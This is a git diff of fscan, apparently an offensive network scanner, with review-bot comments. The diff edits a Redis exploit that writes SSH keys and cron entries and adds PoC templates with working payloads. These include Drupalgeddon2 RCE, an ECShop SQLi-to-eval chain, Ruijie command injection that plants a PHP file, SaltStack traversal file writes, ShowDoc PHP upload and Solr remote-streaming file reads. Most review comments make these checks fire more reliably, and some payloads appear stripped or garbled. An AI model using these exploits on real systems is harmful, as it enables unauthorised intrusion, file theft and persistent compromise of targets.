diff --git a/Plugins/NetBIOS.go b/Plugins/NetBIOS.go
index f34ac73..3e53738 100644
--- a/Plugins/NetBIOS.go
+++ b/Plugins/NetBIOS.go
@@ -137,6 +137,9 @@ func NetBIOS1(info *common.HostInfo) (nbname NbnsName, err error) {
 nbname.msg += "-------------------------------------------\n"
 nbname.msg += msg1 + "\n"
 start := bytes.Index(ret, []byte("NTLMSSP"))
+ if len(ret) < start+45 {
+ return
+ }
 num1, err = bytetoint(ret[start+40 : start+41][0])
 if err != nil {
 return
@@ -151,7 +154,7 @@ func NetBIOS1(info *common.HostInfo) (nbname NbnsName, err error) {
 return
 }
 offset, err := bytetoint(ret[start+44 : start+45][0])
- if err != nil {
+ if err != nil || len(ret) < start+offset+length {
 return
 }
 index := start + offset
@@ -211,13 +214,16 @@ func GetNbnsname(info *common.HostInfo) (nbname NbnsName, err error) {
 data := text[57:]
 var msg string
 for i := 0; i < num; i++ {
+ if len(data) < 18*i+16 {
+ break
+ }
 name := string(data[18*i : 18*i+15])
 flag_bit := data[18*i+15 : 18*i+16]
 if GROUP_NAMES[string(flag_bit)] != "" && string(flag_bit) != "\x00" {
 msg += fmt.Sprintf("%s G %s\n", name, GROUP_NAMES[string(flag_bit)])
 } else if UNIQUE_NAMES[string(flag_bit)] != "" && string(flag_bit) != "\x00" {
 msg += fmt.Sprintf("%s U %s\n", name, UNIQUE_NAMES[string(flag_bit)])
- } else if string(flag_bit) == "\x00" {
+ } else if string(flag_bit) == "\x00" || len(data) >= 18*i+18 {
 name_flags := data[18*i+16 : 18*i+18][0]
 if name_flags >= 128 {
 nbname.group = strings.Replace(name, " ", "", -1)
diff --git a/Plugins/base.go b/Plugins/base.go
index eff4b62..c2848e9 100644
--- a/Plugins/base.go
+++ b/Plugins/base.go
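Review bot: The new length guard does not handle `bytes.Index` returning -1 when no `NTLMSSP` marker is present: with start = -1 the test `len(ret) < start+45` passes for any reply of 44 or more bytes, and `ret[start+40 : start+41]` then reads byte 39 of unrelated data and feeds it to bytetoint as if it were the NTLM field. The guard should be `if start < 0 || len(ret) < start+45 {`. NetBIOS1's body begins and continues outside this hunk, so I cannot see whether a negative start is rejected earlier.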
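Review bot: The `||` in the rewritten `else if` still allows a panic: when `flag_bit` is `\x00` but only 16 or 17 bytes of the record remain (the loop-top guard only requires 18*i+16), the branch is entered and `data[18*i+16 : 18*i+18]` slices past the end. It also changes classification, because any unrecognised flag byte now enters the name_flags branch whenever enough data is left. Requiring a full 18-byte record at the top, `if len(data) < 18*i+18 { break }`, and restoring `} else if string(flag_bit) == "\x00" {` fixes both. GetNbnsname continues outside the hunk.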
@@ -1,16 +1,16 @@
 package Plugins
 var PluginList = map[string]interface{}{
- "21": FtpScan,
- "22": SshScan,
- "135": Findnet,
- "139": NetBIOS,
- "445": SmbScan,
- "1433": MssqlScan,
- "3306": MysqlScan,
- "5432": PostgresScan,
- "6379": RedisScan,
- "9200": elasticsearchScan,
+ "21": FtpScan,
+ "22": SshScan,
+ "135": Findnet,
+ "139": NetBIOS,
+ "445": SmbScan,
+ "1433": MssqlScan,
+ "3306": MysqlScan,
+ "5432": PostgresScan,
+ "6379": RedisScan,
+ //"9200": elasticsearchScan,
 "11211": MemcachedScan,
 "27017": MongodbScan,
 "1000001": MS17010,
diff --git a/Plugins/portscan.go b/Plugins/portscan.go
index 1b53338..93ddbc4 100644
--- a/Plugins/portscan.go
+++ b/Plugins/portscan.go
@@ -17,6 +17,22 @@ type Addr struct {
 func PortScan(hostslist []string, ports string, timeout int64) []string {
 var AliveAddress []string
 probePorts := common.ParsePort(ports)
+ noPorts := common.ParsePort(common.NoPorts)
+ if len(noPorts) > 0 {
+ tmp := make(map[int]struct{})
+ var tmpPorts []int
+ for _, port := range probePorts {
+ for _, noport := range noPorts {
+ if port != noport {
+ if _, ok := tmp[port]; !ok {
+ tmp[port] = struct{}{}
+ tmpPorts = append(tmpPorts, port)
+ }
+ }
+ }
+ }
+ probePorts = tmpPorts
+ }
 workers := common.Threads
 Addrs := make(chan Addr)
 results := make(chan string)
diff --git a/Plugins/redis.go b/Plugins/redis.go
index 849bbd4..6bbeecd 100644
--- a/Plugins/redis.go
+++ b/Plugins/redis.go
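Review bot: The exclusion loop in PortScan keeps a port as soon as it differs from *any* entry of noPorts, so with two or more excluded ports (`-pn 139,445`) each port is re-added on the first non-matching noport and nothing is actually skipped; only a single-value `-pn` behaves as intended. Build a set from noPorts and filter probePorts against it; the extra dedup map is not needed, since ParsePort's output is already used unfiltered when `-pn` is absent. PortScan's body continues past the hunk.

```go
probePorts := common.ParsePort(ports)
if noPorts := common.ParsePort(common.NoPorts); len(noPorts) > 0 {
	skip := make(map[int]struct{}, len(noPorts))
	for _, p := range noPorts {
		skip[p] = struct{}{}
	}
	var kept []int
	for _, p := range probePorts {
		if _, excluded := skip[p]; !excluded {
			kept = append(kept, p)
		}
	}
	probePorts = kept
}
// … unchanged: worker / channel setup …
```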
@@ -96,15 +96,16 @@ func Expoilt(realhost string, conn net.Conn) error {
 return err
 }
 if flagSsh == true {
- result := fmt.Sprintf("Redis:%v like can write /root/.ssh/", realhost)
+ result := fmt.Sprintf("[+] Redis:%v like can write /root/.ssh/", realhost)
 common.LogSuccess(result)
 if common.RedisFile != "" {
 writeok, text, err := writekey(conn, common.RedisFile)
 if err != nil {
+ fmt.Println(fmt.Sprintf("[-] %v SSH write key errer: %v", realhost, text))
 return err
 }
 if writeok {
- result := fmt.Sprintf("%v SSH public key was written successfully", realhost)
+ result := fmt.Sprintf("[+] %v SSH public key was written successfully", realhost)
 common.LogSuccess(result)
 } else {
 fmt.Println("Redis:", realhost, "SSHPUB write failed", text)
@@ -113,7 +114,7 @@ func Expoilt(realhost string, conn net.Conn) error {
 }
 if flagCron == true {
- result := fmt.Sprintf("Redis:%v like can write /var/spool/cron/", realhost)
+ result := fmt.Sprintf("[+] Redis:%v like can write /var/spool/cron/", realhost)
 common.LogSuccess(result)
 if common.RedisShell != "" {
 writeok, text, err := writecron(conn, common.RedisShell)
@@ -121,10 +122,10 @@ func Expoilt(realhost string, conn net.Conn) error {
 return err
 }
 if writeok {
- result := fmt.Sprintf("%v /var/spool/cron/root was written successfully", realhost)
+ result := fmt.Sprintf("[+] %v /var/spool/cron/root was written successfully", realhost)
 common.LogSuccess(result)
 } else {
- fmt.Println("Redis:", realhost, "cron write failed", text)
+ fmt.Println("[-] Redis:", realhost, "cron write failed", text)
 }
 }
 }
diff --git a/Plugins/scanner.go b/Plugins/scanner.go
index 48faa69..4250899 100644
--- a/Plugins/scanner.go
+++ b/Plugins/scanner.go
@@ -26,6 +26,7 @@ func Scan(info common.HostInfo) {
 return
 }
 AlivePorts := PortScan(Hosts, info.Ports, info.Timeout)
+ fmt.Println("alive ports len is:", len(AlivePorts))
 if info.Scantype == "portscan" {
 return
 }
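Review bot: The new error line in the writekey failure path prints `text` but drops `err`, which is the value that actually explains why the key write failed, and the message has a typo ("errer"). Since the error is also returned to the caller this is log-and-return; if a local line is wanted, make it carry both values in one call, `fmt.Printf("[-] %v SSH write key error: %v (%v)\n", realhost, text, err)`, otherwise let the caller log it. Expoilt's body starts and ends outside the hunk.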
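Review bot: `fmt.Println("alive ports len is:", len(AlivePorts))` is an unconditional stdout print in the middle of Scan, while the rest of this commit is standardising user-facing output on `[+]`/`[-]` prefixed lines. If it is meant as progress output it should follow that convention, e.g. `fmt.Printf("[*] alive ports len is: %d\n", len(AlivePorts))`; if it is a debugging aid it should be dropped before merge. Scan's body continues outside the hunk.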
@@ -64,7 +65,7 @@ func Scan(info common.HostInfo) {
 }
 }
 wg.Wait()
- common.Logwg.Wait()
+ common.LogWG.Wait()
 close(common.Results)
 fmt.Println(fmt.Sprintf("已完成 %v/%v", common.End, common.Num))
 }
diff --git a/Plugins/ssh.go b/Plugins/ssh.go
index a0777de..5f74a53 100644
--- a/Plugins/ssh.go
+++ b/Plugins/ssh.go
@@ -56,7 +56,7 @@ func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err er
 flag = true
 if info.Command != "" {
 combo, _ := session.CombinedOutput(info.Command)
- result := fmt.Sprintf("SSH:%v:%v:%v %v \n %v", Host, Port, Username, Password, string(combo))
+ result := fmt.Sprintf("[+] SSH:%v:%v:%v %v \n %v", Host, Port, Username, Password, string(combo))
 common.LogSuccess(result)
 } else {
 result := fmt.Sprintf("[+] SSH:%v:%v:%v %v", Host, Port, Username, Password)
diff --git a/Plugins/webtitle.go b/Plugins/webtitle.go
index bc61d95..c1d7e9f 100644
--- a/Plugins/webtitle.go
+++ b/Plugins/webtitle.go
@@ -6,6 +6,7 @@ import (
 "github.com/shadow1ng/fscan/WebScan"
 "github.com/shadow1ng/fscan/WebScan/lib"
 "github.com/shadow1ng/fscan/common"
+ "golang.org/x/net/html/charset"
 "golang.org/x/text/encoding/simplifiedchinese"
 "golang.org/x/text/transform"
 "io/ioutil"
@@ -113,7 +114,6 @@ func geturl(info *common.HostInfo, flag int, CheckData []WebScan.CheckDatas) (er
 res.Header.Set("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
 res.Header.Set("Accept", "*/*")
 res.Header.Set("Accept-Language", "zh-CN,zh;q=0.9")
- res.Header.Set("Accept-Encoding", "gzip, deflate")
 if common.Pocinfo.Cookie != "" {
 res.Header.Set("Cookie", "rememberMe=1;"+common.Pocinfo.Cookie)
 } else {
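Review bot: Dropping the explicit `Accept-Encoding` header is a behaviour change that needs a why-comment where the headers are set, because the reason is not obvious from the remaining code: when a request does not set that header, Go's http.Transport negotiates gzip itself and transparently decompresses the body, whereas a manually set header makes the transport return the raw compressed bytes, which is presumably what was breaking title and fingerprint matching (assuming the shared client does not set DisableCompression — not visible here). Suggested comment above the Cookie block: `// Accept-Encoding is deliberately not set: the transport then negotiates gzip itself and hands back a decompressed body.` geturl's body continues outside the hunk.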
@@ -167,7 +167,8 @@ func geturl(info *common.HostInfo, flag int, CheckData []WebScan.CheckDatas) (er return "" } encoding := GetEncoding() - if encoding == "gbk" || encoding == "gb2312" { + _, charsetName, _ := charset.DetermineEncoding(body, "") + if encoding == "gbk" || encoding == "gb2312" || charsetName == "gbk" { titleGBK, err := Decodegbk(text) if err == nil { title = string(titleGBK) diff --git a/WebScan/info/rules.go b/WebScan/info/rules.go index 3112cde..bd6c638 100644 --- a/WebScan/info/rules.go +++ b/WebScan/info/rules.go @@ -62,8 +62,8 @@ var RuleDatas = []RuleData{ {"Citrix-Access-Gateway", "code", "(Citrix Access Gateway)"}, {"华为 MCU", "code", "(McuR5-min.js)"}, {"TP-LINK Wireless WDR3600", "code", "(TP-LINK Wireless WDR3600)"}, - {"泛微协同办公OA", "headers", "(ecology_JSessionid)"}, - {"泛微协同办公OA", "code", "(/spa/portal/public/index.js)"}, + {"泛微OA", "headers", "(ecology_JSessionid)"}, + {"泛微OA", "code", "(/spa/portal/public/index.js)"}, {"华为_HUAWEI_ASG2050", "code", "(HUAWEI ASG2050)"}, {"360网站卫士", "code", "(360wzb)"}, {"Citrix-XenServer", "code", "(Citrix Systems, Inc. XenServer)"}, @@ -124,6 +124,8 @@ var RuleDatas = []RuleData{ {"大汉版通发布系统", "code", "(大汉版通发布系统|大汉网络)"}, {"druid", "code", "(druid.index|DruidDrivers|DruidVersion|Druid Stat Index)"}, {"Jenkins", "code", "(Jenkins)"}, + {"红帆OA", "code", "(iOffice)"}, + {"VMware vSphere", "code", "(VMware vSphere)"}, } var Md5Datas = []Md5Data{ diff --git a/WebScan/lib/check.go b/WebScan/lib/check.go index 51d6df2..a8b578a 100644 --- a/WebScan/lib/check.go +++ b/WebScan/lib/check.go @@ -67,7 +67,7 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error) { } env, err := NewEnv(&c) if err != nil { - //fmt.Println("environment creation error: %s\n", err) + //fmt.Printf("environment creation error: %s\n", err) return false, err } req, err := ParseRequest(oReq) diff --git a/WebScan/lib/eval.go b/WebScan/lib/eval.go index cb1a7ea..c723544 100644 --- a/WebScan/lib/eval.go +++ b/WebScan/lib/eval.go 
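Review bot: `charset.DetermineEncoding` returns the resolved `encoding.Encoding` as its first value, but the hunk discards it (and the `certain` flag) and only compares the name against `"gbk"`, so a page sniffed as `gb18030` or any other non-UTF-8 charset still falls through to the raw bytes. At minimum widen the test to `charsetName == "gbk" || charsetName == "gb18030"`; better, keep the returned encoding and decode `text` with `e.NewDecoder()` so every sniffed charset is handled by one path. Passing `""` as the content type also means the server's Content-Type header is ignored by the sniff, which is fine only if `GetEncoding()` already covers that case (its body is outside the hunk).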
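Review bot: The new fingerprint `{"红帆OA", "code", "(iOffice)"}` keys on a single generic word, unlike the neighbouring rules that match a product-specific path or script name (`/spa/portal/public/index.js`, `McuR5-min.js`), so any page that merely mentions "iOffice" will be tagged as this OA product. If a more specific marker (a login path or asset name) is known it should replace or be combined with the word; if not, a comment on the line noting the expected false-positive rate would help whoever triages results.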
@@ -26,19 +26,19 @@ func NewEnv(c *CustomLib) (*cel.Env, error) { func Evaluate(env *cel.Env, expression string, params map[string]interface{}) (ref.Val, error) { ast, iss := env.Compile(expression) if iss.Err() != nil { - //fmt.Println("compile: ", iss.Err()) + //fmt.Printf("compile: ", iss.Err()) return nil, iss.Err() } prg, err := env.Program(ast) if err != nil { - //fmt.Println("Program creation error: %v", err) + //fmt.Printf("Program creation error: %v", err) return nil, err } out, _, err := prg.Eval(params) if err != nil { - //fmt.Println("Evaluation error: %v", err) + //fmt.Printf("Evaluation error: %v", err) return nil, err } return out, nil diff --git a/WebScan/lib/http.go b/WebScan/lib/http.go index 2b38559..23a81d5 100644 --- a/WebScan/lib/http.go +++ b/WebScan/lib/http.go @@ -10,6 +10,7 @@ import ( "net/http" "net/url" "strconv" + "strings" "time" ) @@ -39,6 +40,8 @@ func InitHttpClient(ThreadsNum int, DownProxy string, Timeout time.Duration) err if DownProxy != "" { if DownProxy == "1" { DownProxy = "http://127.0.0.1:8080" + } else if !strings.Contains(DownProxy, "://") { + DownProxy = "http://127.0.0.1:" + DownProxy } u, err := url.Parse(DownProxy) if err != nil { diff --git a/WebScan/pocs/dlink-cve-2020-25078-account-disclosure.yml b/WebScan/pocs/dlink-cve-2020-25078-account-disclosure.yml new file mode 100644 index 0000000..7fa21e7 --- /dev/null +++ b/WebScan/pocs/dlink-cve-2020-25078-account-disclosure.yml @@ -0,0 +1,12 @@ +name: poc-yaml-dlink-cve-2020-25078-account-disclosure +rules: + - method: GET + path: >- + /config/getuser?index=0 + follow_redirects: false + expression: | + response.status == 200 && response.body.bcontains(b"name=admin") && response.body.bcontains(b"pass=") && response.headers["Content-Type"].contains("text/plain") +detail: + author: kzaopa(https://github.com/kzaopa) + links: + - https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg \ No newline at end of file 
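Review bot: `//fmt.Printf("compile: ", iss.Err())` passes an argument with no format verb, so the moment someone uncomments it for debugging `go vet` rejects the call and the error would not be printed anyway. If these lines are kept as debugging hooks they should be valid as written, e.g. `//fmt.Printf("compile: %v\n", iss.Err())`; the other two lines in the hunk already carry a `%v` but lack the trailing newline.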
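Review bot: The new `-proxy` shorthand treats every value without `://` as a bare port on 127.0.0.1, so `-proxy 10.0.0.5:8080` becomes `http://127.0.0.1:10.0.0.5:8080`, which `url.Parse` rejects as an invalid port, and a plain host without a port would silently point the proxy at localhost. Only apply the localhost shortcut when the value is purely numeric and just prepend the scheme otherwise; `strconv` is already imported in this file. InitHttpClient continues outside the hunk.

```go
if DownProxy == "1" {
	DownProxy = "http://127.0.0.1:8080"
} else if _, perr := strconv.Atoi(DownProxy); perr == nil {
	// bare port number: proxy listens on localhost
	DownProxy = "http://127.0.0.1:" + DownProxy
} else if !strings.Contains(DownProxy, "://") {
	// host[:port] without a scheme: assume a plain HTTP proxy
	DownProxy = "http://" + DownProxy
}
// … unchanged: url.Parse and transport setup …
```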
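Review bot: The expression reads the header through `response.headers["Content-Type"]`, whereas the other rules in this commit that inspect the type use `response.content_type`; if the engine's header map is keyed case-sensitively (not visible here), a server sending `content-type: text/plain` makes the whole conjunction false and the account disclosure is missed. Prefer `response.content_type.contains("text/plain")` for consistency and robustness. The same lookup style appears in the kingsoft and tongda POCs added in this commit.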
diff --git a/WebScan/pocs/drupal-cve-2018-7600-rce2.yml b/WebScan/pocs/drupal-cve-2018-7600-rce2.yml new file mode 100644 index 0000000..9e723bb --- /dev/null +++ b/WebScan/pocs/drupal-cve-2018-7600-rce2.yml @@ -0,0 +1,29 @@ +name: poc-yaml-drupal-cve-2018-7600-rce +set: + r1: randomLowercase(4) + r2: randomLowercase(4) +rules: + - method: POST + path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password + search: | + name="form_build_id"\s+value="(?P.+?)" + expression: | + response.status == 200 + - method: POST + path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + form_build_id={{build_id}} + expression: | + response.body.bcontains(bytes(r1 + "%" + r2)) +detail: + links: + - https://github.com/dreadlocked/Drupalgeddon2 + - https://paper.seebug.org/567/ +test: + target: http://cve-2018-7600-8-x.vulnet:8080/ diff --git a/WebScan/pocs/ecshop-rce2.yml b/WebScan/pocs/ecshop-rce2.yml new file mode 100644 index 0000000..c79f02c --- /dev/null +++ b/WebScan/pocs/ecshop-rce2.yml 
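Review bot: The `search` pattern is shown as `(?P.+?)`, a named group with no name, yet the second rule substitutes `{{build_id}}`; as rendered, the regex either fails to compile or never populates build_id, and the POC can never fire. The intended line is almost certainly `name="form_build_id"\s+value="(?P<build_id>.+?)"` — the `<build_id>` may have been stripped by whatever rendered this page, so verify the file on disk. The showdoc and solr POCs in this commit show the same loss.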
@@ -0,0 +1,17 @@ +name: poc-yaml-ecshop-rce +set: + r1: randomInt(40000, 44800) + r2: randomInt(40000, 44800) +rules: + - method: POST + path: /user.php + headers: + Referer: >- + 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953aads + Content-Type: application/x-www-form-urlencoded + body: action=login&pp123=printf({{r1}}*{{r2}}); + expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) +detail: + author: 凉风(http://webkiller.cn/) + links: + - https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md \ No newline at end of file diff --git a/WebScan/pocs/jumpserver-unauth-rce2.yml b/WebScan/pocs/jumpserver-unauth-rce2.yml new file mode 100644 index 0000000..34bb49e --- /dev/null +++ b/WebScan/pocs/jumpserver-unauth-rce2.yml @@ -0,0 +1,21 @@ +name: poc-yaml-jumpserver-unauth-rce +set: + r1: randomLowercase(5) +rules: + - method: GET + path: /api/v1/users/connection-token/ + follow_redirects: false + expression: | + response.status == 401 && response.content_type.contains("application/json") && response.body.bcontains(b"not_authenticated") + - method: GET + path: /api/v1/users/connection-token/?user-only={{r1}} + follow_redirects: false + expression: | + response.status == 404 && response.content_type.contains("application/json") && response.body.bcontains(b"\"\"") +detail: + author: mvhz81 + info: jumpserver unauth read logfile + jumpserver rce + links: + - https://s.tencent.com/research/bsafe/1228.html + - https://mp.weixin.qq.com/s/KGRU47o7JtbgOC9xwLJARw + - https://github.com/jumpserver/jumpserver/releases/download/v2.6.2/jms_bug_check.sh 
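Review bot: The `detail` section gives no hint that this is an intrusive check: the hex-encoded SQL in the Referer resolves to `eval($_POST[pp123])`, so the request executes attacker-supplied PHP on the target, and only the body limits it to `printf(r1*r2)`. Operators triaging hits need to know that, so add an `info:` line such as `info: executes PHP via SQLi-into-eval; the proof is limited to printf but the primitive is full RCE` next to the author and links.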
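Review bot: The `info` line says "unauth read logfile + jumpserver rce", but neither rule exercises either; rule 2 only requires a JSON 404 whose body contains `""`, which is a version-behaviour fingerprint rather than proof of the vulnerability. Reword `info` to say this is a fingerprint of the vulnerable release (e.g. `info: fingerprint only - matches the unauthenticated connection-token behaviour of affected releases, does not confirm RCE`) so a hit is not reported as confirmed exploitation.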
diff --git a/WebScan/pocs/kingsoft-v8-file-read.yml b/WebScan/pocs/kingsoft-v8-file-read.yml new file mode 100644 index 0000000..02b3eb0 --- /dev/null +++ b/WebScan/pocs/kingsoft-v8-file-read.yml @@ -0,0 +1,12 @@ +name: poc-yaml-kingsoft-v8-file-read +rules: + - method: GET + path: >- + /htmltopdf/downfile.php?filename=/windows/win.ini + follow_redirects: false + expression: | + response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]")) && response.headers["Content-Type"].contains("application/zip") +detail: + author: kzaopa(https://github.com/kzaopa) + links: + - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/b6f8fbfef46ad1c3f8d5715dd19b00ca875341c2/_book/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E9%87%91%E5%B1%B1/%E9%87%91%E5%B1%B1%20V8%20%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9F%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md diff --git a/WebScan/pocs/ruijie-eg-rce.yml b/WebScan/pocs/ruijie-eg-rce.yml new file mode 100644 index 0000000..2aac600 --- /dev/null +++ b/WebScan/pocs/ruijie-eg-rce.yml 
@@ -0,0 +1,29 @@ +name: poc-yaml-ruijie-eg-rce +set: + r1: randomLowercase(4) + r2: randomLowercase(4) + phpcode: > + "" + payload: base64(phpcode) +rules: + - method: POST + path: "/guest_auth/guestIsUp.php" + headers: + User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36" + Accept-Encoding: "gzip, deflate" + Content-Type: "application/x-www-form-urlencoded; charset=UTF-8" + body: | + ip=127.0.0.1|echo '{{payload}}' | base64 -d > {{r2}}.php&mac=00-00 + expression: | + response.status == 200 + - method: GET + path: "/guest_auth/{{r2}}.php" + headers: + User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36" + Accept-Encoding: "gzip, deflate" + expression: | + response.body.bcontains(bytes(r1)) +detail: + author: White(https://github.com/WhiteHSBG) + links: + - https://xz.aliyun.com/t/9016?page=1 \ No newline at end of file diff --git a/WebScan/pocs/saltstack-cve-2021-25282-file-write.yml b/WebScan/pocs/saltstack-cve-2021-25282-file-write.yml new file mode 100644 index 0000000..63f6a1b --- /dev/null +++ b/WebScan/pocs/saltstack-cve-2021-25282-file-write.yml 
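Review bot: Rule 1 drops a PHP file `{{r2}}.php` into `/guest_auth/` on the gateway through the injected shell command and nothing ever removes it, so every positive hit leaves a world-reachable arbitrary-PHP artifact on a production device. The written code should at least self-delete after echoing r1 (`unlink(__FILE__);`), and `detail` should state that the check writes a file. Separately, `phpcode` is shown here as an empty `""` — the `<?php … ?>` body was probably stripped in rendering, so confirm the on-disk file actually echoes r1, otherwise rule 2 can never match.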
@@ -0,0 +1,22 @@ +name: poc-yaml-saltstack-cve-2021-25282-file-write +set: + r1: randomLowercase(5) +rules: + - method: GET + path: /run + follow_redirects: false + expression: | + response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"wheel_async") && response.body.bcontains(b"runner_async") + - method: POST + path: /run + headers: + Content-type: application/json + body: >- + {"eauth":"auto","client":"wheel_async","fun":"pillar_roots.write","data":"{{r1}}","path":"../../../../../../../../../tmp/{{r1}}"} + follow_redirects: false + expression: | + response.status == 200 && response.content_type.icontains("application/json") && "salt/wheel/d*".bmatches(response.body) +detail: + author: jweny(https://github.com/jweny) + links: + - https://www.anquanke.com/post/id/232748 \ No newline at end of file diff --git a/WebScan/pocs/seeyon-a6-employee-info-leak.yml b/WebScan/pocs/seeyon-a6-employee-info-leak.yml new file mode 100644 index 0000000..b655ab7 --- /dev/null +++ b/WebScan/pocs/seeyon-a6-employee-info-leak.yml @@ -0,0 +1,11 @@ +name: poc-yaml-seeyon-a6-employee-info-leak +rules: + - method: GET + path: /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0 + expression: + response.status == 200 && response.body.bcontains(b"[Content_Types].xml") && response.body.bcontains(b"Excel.Sheet") +detail: + author: sakura404x + version: 致远A6 + links: + - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md \ No newline at end of file diff --git a/WebScan/pocs/showdoc-uploadfile.yml b/WebScan/pocs/showdoc-uploadfile.yml new file mode 100644 index 0000000..0921919 --- /dev/null +++ b/WebScan/pocs/showdoc-uploadfile.yml 
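Review bot: `pillar_roots.write` with the traversal path creates `/tmp/{{r1}}` on the Salt master and the POC never removes it, so each vulnerable host scanned keeps an artifact; `detail` should say so. The final match `"salt/wheel/d*".bmatches(response.body)` also matches `salt/wheel/` followed by zero `d` characters, so it does not actually require a job id; if the intent is the `salt/wheel/<jid>` tag that wheel_async returns, use `r"salt/wheel/\d+".bmatches(response.body)` (the raw-string form is already used elsewhere in this commit).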
@@ -0,0 +1,25 @@ +name: poc-yaml-showdoc-uploadfile +set: + r1: randomLowercase(4) + r2: randomLowercase(4) +rules: + - method: POST + path: /index.php?s=/home/page/uploadImg + headers: + Content-Type: "multipart/form-data; boundary=--------------------------835846770881083140190633" + follow_redirects: false + body: "----------------------------835846770881083140190633\nContent-Disposition: form-data; name=\"editormd-image-file\"; filename=\"{{r1}}.<>php\"\nContent-Type: text/plain\n\n\n----------------------------835846770881083140190633--" + expression: | + response.status == 200 && response.body.bcontains(b"success") + search: | + (?P\d{4}-\d{2}-\d{2})\\/(?P[a-f0-9]+\.php) + - method: GET + path: /Public/Uploads/{{date}}/{{file}} + follow_redirects: false + expression: | + response.status == 200 && response.body.bcontains(bytes(r2)) +detail: + author: White(https://github.com/WhiteHSBG) + Affected Version: "showdoc <= 2.8.6" + links: + - https://github.com/star7th/showdoc/pull/1059 \ No newline at end of file diff --git a/WebScan/pocs/solr-fileread1.yml b/WebScan/pocs/solr-fileread1.yml new file mode 100644 index 0000000..0b92afd --- /dev/null +++ b/WebScan/pocs/solr-fileread1.yml 
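Review bot: The multipart body as shown carries no payload after `Content-Type: text/plain` (the PHP that should print r2 was likely stripped in rendering) and the `search` groups read `(?P\d{4}…)` and `(?P[a-f0-9]+\.php)` without names, yet rule 2 substitutes `{{date}}` and `{{file}}`; verify that the on-disk file has `(?P<date>…)` and `(?P<file>…)` and a body that echoes r2. Independently, the uploaded `.php` under `/Public/Uploads/` persists on the target after the scan, so either make the payload self-deleting or note in `detail` that the check leaves a file behind.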
@@ -0,0 +1,25 @@ +name: poc-yaml-solr-fileread1 +rules: + - method: GET + path: "/solr/admin/cores?indexInfo=false&wt=json" + expression: response.status == 200 && response.body.bcontains(b"responseHeader") + search: >- + "name":"(?P.+?)" + - method: POST + path: "/solr/{{core}}/config" + body: | + {"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}} + expression: | + response.body.bcontains(b"responseHeader") + - method: POST + path: "/solr/{{core}}/debug/dump?param=ContentStreams" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + stream.url=file:///etc/passwd + expression: | + response.status == 200 && r'root:[x*]:0:0:'.bmatches(response.body) +detail: + author: whami-root(https://github.com/whami-root) + links: + - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186 \ No newline at end of file diff --git a/WebScan/pocs/solr-fileread2.yml b/WebScan/pocs/solr-fileread2.yml new file mode 100644 index 0000000..60def9e --- /dev/null +++ b/WebScan/pocs/solr-fileread2.yml @@ -0,0 +1,25 @@ +name: poc-yaml-solr-fileread2 +rules: + - method: GET + path: "/solr/admin/cores?indexInfo=false&wt=json" + expression: "true" + search: >- + "name":"(?P.+?)" + - method: POST + path: "/solr/{{core}}/config" + body: | + {"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}} + expression: | + response.body.bcontains(b"responseHeader") + - method: POST + path: "/solr/{{core}}/debug/dump?param=ContentStreams" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + stream.url=file:///c://windows/win.ini + expression: | + response.status == 200 && response.body.bcontains(b"for 16-bit app support") +detail: + author: whami-root(https://github.com/whami-root) + links: + - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186 \ No newline at end of file 
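Review bot: Rule 2 persistently enables `requestDispatcher.requestParsers.enableRemoteStreaming` on the core through the Config API and no later rule turns it off, so a scan leaves the target permanently more exposed — remote streaming is exactly the primitive that makes `stream.url` file reads and SSRF possible. Either append a rule that sets the property back to `false`, or state in `detail` that the check makes a persistent configuration change on the target.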
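Review bot: Rule 1's `expression: "true"` accepts any response from `/solr/admin/cores`, so when the endpoint is absent or the `"name"` search matches nothing, `{{core}}` is empty and rules 2–3 are sent to `/solr//config` and `/solr//debug/dump`. Rule 1 should require `response.status == 200 && response.body.bcontains(b"responseHeader")` as solr-fileread1 does. This POC also persists `enableRemoteStreaming=true` on the target with no rollback rule.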
